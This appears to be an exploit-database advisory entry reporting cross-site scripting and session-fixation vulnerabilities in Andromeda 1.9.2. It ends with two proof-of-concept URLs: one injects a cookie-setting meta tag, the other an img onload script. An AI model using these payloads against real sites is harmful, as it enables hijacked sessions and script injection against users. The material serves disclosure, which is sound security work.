vendor: Andromeda
by: Unknown
N/A
CVSS
N/A
Cross-Site Scripting, Session Fixation
Unknown
CWE
Product Name: Andromeda
Affected Version From: 1.9.2002
Affected Version To: Unknown
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Andromeda Cross-Site Scripting and Session Fixation Vulnerabilities

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and gain unauthorized access to the affected application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38735/info

Andromeda is prone to a cross-site scripting vulnerability and a session-fixation vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and gain unauthorized access to the affected application.

Andromeda 1.9.2 is vulnerable; other versions may also be affected. 

http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://www.example.com/1.JPG+onload=alert(00213771818860)>